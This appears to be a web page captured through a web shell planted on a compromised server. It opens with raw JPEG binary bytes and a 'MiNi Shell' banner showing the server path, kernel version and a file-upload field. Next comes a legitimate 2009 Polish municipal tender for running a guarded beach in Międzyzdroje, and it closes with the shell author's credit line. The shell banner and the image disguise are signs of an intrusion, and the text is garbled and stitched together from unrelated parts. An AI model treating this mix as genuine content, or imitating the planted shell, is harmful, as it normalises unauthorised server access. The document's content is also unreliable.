JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090420/64017-N-2009.html

<p class="kh_header"><b>Międzyzdroje: Urządzenie   i prowadzenie miejskiej plaży strzeżonej w Międzyzdrojach, w okresie: od 12 czerwca 2009 r. do 18 wrzenia 2009 roku - zgodnie z przepisami Rozporządzenia Rady Ministrów z dnia 6 maja 1997 roku ( Dz.U. Nr 57, poz. 358 ) nr sprawy: ZP 341/N -6/2009</b><br>
<b>Numer ogłoszenia: 64017 - 2009; data zamieszczenia: 20.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Międzyzdroje , ul. Książąt Pomorskich 5, 72-500 Międzyzdroje, tel. 091 3275652, faks 0913275630.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Urządzenie   i prowadzenie miejskiej plaży strzeżonej w Międzyzdrojach, w okresie: od 12 czerwca 2009 r. do 18 wrzenia 2009 roku - zgodnie z przepisami Rozporządzenia Rady Ministrów z dnia 6 maja 1997 roku ( Dz.U. Nr 57, poz. 358 ) nr sprawy: ZP 341/N -6/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest urządzenie   i prowadzenie miejskiej plaży strzeżonej w Międzyzdrojach, w okresie: od 12 czerwca 2009 r. do 18 wrzenia 2009 roku - zgodnie z przepisami Rozporządzenia Rady Ministrów z dnia 6 maja 1997 roku ( Dz.U. Nr 57, poz. 358 ) wg niżej wymienionych zasad:
     1)  przygotowanie kąpieliska:  
- od dnia 12.06 do 14.06.2009 r.  
      2)  likwidacja kąpieliska: 
      - od dnia 16.09 do 18.09.2009 r. 
      3) prowadzenie kąpieliska w okresie:  od dnia  15.06 do 30.06.2009 r. i od dnia 01.09 do 15.09.2009 r., -  na odcinku 400 mb linii brzegowej, po stronie wschodniej ( 1 odcinek - 200m ) i zachodniej ( 1 odcinek 200m ), od Molo.
      4) prowadzenie kąpieliska w okresie : od dnia 01 lipca  do 31 sierpnia 2009 r., -  na odcinku 1200 mb linii brzegowej, po stronie wschodniej ( 1 odcinek -  600m ) i zachodniej ( 1 odcinek - 600m ), od Molo.
      5) dokładna lokalizacja i długość poszczególnych odcinków plaży strzeżonej, po stronie wschodniej i zachodniej oraz dokładne miejsca rozmieszczenia wież ratowniczych zostaną ustalone bezpośrednio przed rozpoczęciem wykonywania usługi, zgodnie z wymaganiami określonymi w niniejszej Specyfikacji Istotnych Warunków Zamówienia, zwanej dalej SIWZ.
1.	Na Wykonawcy ciąży obowiązek urządzenia i prowadzenia dwóch wyznaczonych  odcinków plaży strzeżonej - po stronie wschodniej ( 1 odcinek - 200m ) i zachodniej ( 1 odcinek - 200m ), mając za  punkt odniesienia obiekt Molo w Międzyzdrojach, w terminach od 15 - 30.06.2009 r. i od 01 - 15.09.2009 r.  - zgodnie z wymogami zawartymi w Rozporządzeniu Rady Ministrów z dnia 6 maja 1997 roku ( Dz. U. Nr 57, poz. 358 ) w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne ).
	
2.	Na Wykonawcy ciąży obowiązek urządzenia i prowadzenia dwóch wyznaczonych  odcinków plaży strzeżonej - po stronie wschodniej ( 1 odcinek - 600m ) i zachodniej   ( 1 odcinek - 600m ), mając punkt odniesienia obiekt Molo w Międzyzdrojach, w terminach od 01 lipca do 31 sierpnia 2009 r.  - zgodnie z wymogami zawartymi w Rozporządzeniu Rady Ministrów z dnia 6 maja 1997 roku ( Dz. U. Nr 57, poz. 358) w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływających, kąpiących się i uprawiających sporty wodne ).

 Obowiązki Wykonawcy :
realizacja zamówienia zgodnie z obowiązującymi przepisami  zawartymi                         w Rozporządzaniu Rady Ministrów z dnia 6 maja 1997 roku, w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływalniach, kapiących się  i uprawiających sporty wodne, w tym: 
1)	zapewnienie warunków bezpieczeństwa osób pływających, kąpiących się                     i uprawiających sporty wodne  - Rozdział 3  , w tym: 
a.	przygotowanie kąpieliska zorganizowanego - § 7, § 8 ust.2 , 
b.	wykonanie i wywieszenie regulaminów kąpieliska i oznaczenie lokalizacji kąpieliska - § 8 ust. 5, § 9 ust. 1  i ust.2, § 10 ust. 1,2, 3 i 4.
c.	uzyskanie pozytywnych opinii - § 9 ust. 3,
d.	przestrzeganie norm zatrudnienia ratowników - § 15,                                                                     
2)	Przestrzeganie szczegółowych warunków bezpieczeństwa osób korzystających z kąpielisk  i pływalni określa załącznik nr 4 do rozporządzenia - cały zakres, z wyjątkiem  § 7, 
      § 8.1 § 8.2	.
3)	Wyposażenie kąpieliska wg wymogów określonych w załączniku Nr 5 pn. Wzory znaków zakazu, ostrzegawczych i informacyjnych ,
4)	Posiadanie niezbędnego sprzętu, wyszególnionego poniżej, zgodnie z Rozporządzeniem         Rady Ministrów z dnia 6 maja 1997 roku ( Dz.U. Nr 57, poz. 358) w sprawie określenia warunków bezpieczeństwa osób przebywających w górach pływających,  kąpiących się i uprawiających sporty wodne ;

Wykaz niezbędnych narzędzi i urządzeń

Wykaz  sprzętu ratowniczego, który musi oferent gwarantować w swojej ofercie

Sprzęt na jedną wieżę :

1.	WIEŻA RATOWNICZA 
2.	ZESTAW FLAG NA KAŻDĄ WIEŻĘ
3.	TABLICE INFORMACYJNE O POMIARACH 
4.	OZNAKOWANIE KĄPIELISKA - BOJE, BALASTY  
                             ( ILOŚĆ WG NORM I POTRZEB ) 
5.	OZNAKOWANIE INDYWIDUALNE RATOWNIKA ( CZAPECZKA       
KOSZULKA, SZORTY )
6.	WYPOSAŻENIE OSOBISTE - BAYWATCH 3 SZT. 
7.	SPRZĘT MEDYCZNY : ZESTAW REANIMACYJNY Z HOMOLOGACJĄ, APTECZKA, ŚRODKI OPATRUNKOWE, NOSZE, KOŁNIERZ ORTOPEDYCZNY, TERMOMETR
8.	LINY ASEKURACYJNE Z KOŁOWROTEM O DŁ. MINIMUM 80M NA KAŻDYM STANOWISKU RATOWNICZYM ( JEDNA NA KAŻDE 100M LINII BRZEGOWEJ )
9.	KOŁA RATUNKOWE Z LINKĄ LUB PASY RATUNKOWE -  JEDNO NA 50 M LINII BRZEGOWEJ ZAWIESZONE NA SŁUPKACH W POBLIŻU LUSTRA WODY 
10.	RZUTKA RATUNKOWA
11.	KOCE SZT.2 
12.	BOSAKI RATUNKOWE 2 SZT
13.	LORNETKA
14.	ŚRODKI ŁĄCZNOŚCI 
15.	SPRZĘT DO NURKOWANIA ABC
16.	TUBA ELEKTROAKUSTYCZNA 1 SZT 
17.	ŁÓDŹ WIOSŁOWA ( Z WYPOSAZENIEM ZGODNYM Z NORMĄ ) JEDNA NA KAŻDE 100 M LINII BRZEGOWEJ 
Ponadto:  
1.	ŁÓDŹ MOTOROWA 1 SZT. NA KAŻDE 400 M LINII BRZEGOWEJ, W TYM  1 PŁYWAJACA JEDNOSTKA MUSI POSIADAĆ KARTĘ BEZPIECZEŃSTWA I BYĆ ZDOLNĄ PORUSZAĆ SIĘ W STREFIE PRZYBRZEŻNEJ PRZY SILE WIATRU RÓWNEJ CO NAJMNIEJ 6 B, ORAZ POSIADAĆ ZAŁOGĘ Z UPRAWNIENIAMI. ( MIN. STARSZY STERNIK ). 
2.	SPRZĘT MEDYCZNY: SZYNY KRAMERA, ŚRODKI OPATRUNKOWE I MEDYCZNE - ( ZGODNIE Z  ZAŁĄCZNIKIEM NR  6  WW. ROZPORZĄDZENIA )
3.	TABLICE; POCZĄTEK I KONIEC PLAŻY 

	Wykonawca jest zobowiązany, do uruchomienia dwóch punktów medycznych jeden od strony morza, drugi od strony lądu oraz zatrudnienia co najmniej jednego ratownika medycznego posiadającego minimum dwuletnie doświadczenie w pracy w jednostkach pomocy doraźnej ( tj. zespół wyjazdowy pogotowia ratunkowego, Lotnicze Pogotowie Ratunkowe, Szpitalny Oddział Ratunkowy). Punkty medyczne muszą być wyposażone w minimum następujący sprzęt : defibrylator ( AED ), zestaw do przyrządowego udrażniania dróg oddechowych, zestaw do prowadzenia tlenoterapii biernej, ssak, worek samorozprężalny wraz z kompletem masek ( dla dzieci i osób dorosłych ), zestaw leków zgodnie z załącznikiem nr 1 do Rozporządzenia  Ministra Zdrowia z dnia 29 grudnia 2008r. w sprawie szczegółowego zakresu medycznych czynności ratunkowych, które mogą być podejmowane przez ratownika medycznego ( Dz. U. z dnia 11 stycznia 2007r. 07.4.33 ), oraz zestaw kołnierzy do unieruchamiania kręgosłupa szyjnego, zestaw szyn Kramera, 3 szt. kocy termicznych, zestaw do opatrywania ran ( bandaże, gaziki, plastry, siatki podtrzymujące itp. ).
	Wykonawca ma obowiązek realizowania  programu  Błękitna flaga .
	Wykonawca ma obowiązek współpracować z Centrum Koordynacji Ratownictwa w Sopocie ( w ramach programu numer ratunkowy nad wodą 601 100 100 ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.36.10.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 12.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia  mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:
1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności,
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia .1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4  Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
Celem spełnienia warunku zawartego w art. 22 ustawy prawa zamówień publicznych wykonawca musi wykazać iż :
	posiada uprawnienia   zgodnie z § 7.1 Rozporządzenia Rady Ministrów z dnia 6 maja 1997 roku w sprawie określenia warunków bezpieczeństwa osób przebywających w górach, pływalniach, kąpiących się i uprawiających sporty wodne  ( Dz.U Nr 57 poz. 358 ), 
	lub posiada uprawnienia wydane na podstawie  § 6.1 Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 12 listopada 2002 roku w sprawie szczegółowego zakresu obowiązków i uprawnień specjalistycznych organizacji ratowniczych, warunków ich wykonywania przez inne organizacje ratownicze oraz rodzaju i wysokości świadczeń przysługujących ratownikom górskim i wodnym w związku z udziałem w akcji ratowniczej ( Dz.U. z 2002r. Nr 193, poz.1624 )
	lub prowadzi działalność gospodarczą na podstawie art. 6.1, oraz art. 18 i 19, ustawy z dnia 2 lipca 2004r., o swobodzie działalności gospodarczej ( Dz. U. z 2007r. Nr 155, poz. 1095, z późniejszymi zmianami ) , której przedmiotem jest świadczenie usług tożsamych z przedmiotem niniejszego zamówienia publicznego
	 w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykaże, że wykonał co najmniej 2 zamówienia tj.  usługi prowadzenia plaży strzeżonej  o wartości nie mniejszej niż 200 000,00 zł  brutto  każda, z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane z należytą starannością  
	posiada niezbędną kadrę, legitymującą się  wymaganymi uprawnieniami ratowniczymi  , a także   dysponuje przynajmniej: 
	jedną osobą z uprawnieniami Starszego Ratownika 
	jedną osobą z uprawnieniami Sternika Motorowodnego 
	jedną osobą z uprawnieniami Starszego Sternika Motorowodnego
	jedną osobą z uprawnieniami Ratownika Medycznego 

	dysponuje lub będzie dysponował  niezbędnym sprzętem ratowniczym określonym w SIWZ - opis   przedmiotu zamówienia ,
	                posiada polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest      ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności o wartości minimum 100 000, 00 zł na każde zdarzenie (NW).  
2. Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy:
2.1 nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt 1.1 do 1.4.
2.2 podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 Prawa zamówień publicznych.
2.3 wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji.
2.4 złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5 nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art. 26 ust. 3 Prawa zamówień publicznych.
2.6 nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą. 
3. Zamawiający odrzuca ofertę jeżeli:
3.1 jest niezgodna z ustawą
3.2 jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3 Prawa zamówień publicznych.
3.3 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.4 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.5 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia.
3.6 zawiera błędy w obliczeniu ceny 
3.7 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych 
3.8 jest nieważna na podstawie odrębnych przepisów, 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
  B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.2) Dokumenty potwierdzające posiadanie uprawnień pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
  B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
  B.4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych.   
  
  C.W celu potwierdzenia spełnienia warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
C) 1 Wykaz wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonywanych ,  co najmniej dwóch   usług  w okresie ostatnich trzech lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu,  dat wykonania i odbiorców  wraz z dokumentami potwierdzającymi, że  usługi zostały wykonane należycie.   Przez usługę odpowiadającą swoim rodzajem i wartością Zamawiający rozumie wykonanie co najmniej dwóch  usług w zakresie prowadzenia plaży strzeżonej  o wartości nie mniejszej niż 200 000,00 zł  brutto każda,
c.2) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca lub będzie dysponował .
c.3) Pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń , jeżeli w wykazie , o którym mowa w pkt c2) wykonawca wskazał narzędzia i urządzenia, którymi będzie dysponował,   
  C.4) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie tym wykonawca wskazał osoby, którymi będzie dysponował .  
  C.5) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia tj.  uprawnienia starszego ratownika, uprawnienie sternika motorowodnego, uprawnienie starszego sternika motorowodnego, uprawnienia ratownika medycznego.
D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: tj.  Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  o wartości minimum 100 000, 00 zł na każde zdarzenie (NW).  

E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
E1) Zamiast dokumentów, o których mowa w pkt. B.1), B.3)  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

  -Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   

E. Dokumenty wymagane w przypadku składania oferty wspólnej: 

E.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy

  - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. B1, B3  dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie   

F. Postanowienia dotyczące składanych dokumentów

F.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem za zgodność z oryginałem.
Pełnomocnictwo musi być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
F.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzyzdroje.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Międzyzdroje ulica Książąt Pomorskich 5 72 -500 Międzyzdroje.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 10:00, miejsce: w siedzibie Zamawiającego Gmina Międzyzdroje ulica Kaiążąt Pomorskich 5 72 -500 Międzyzdroje pokój nr 10 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com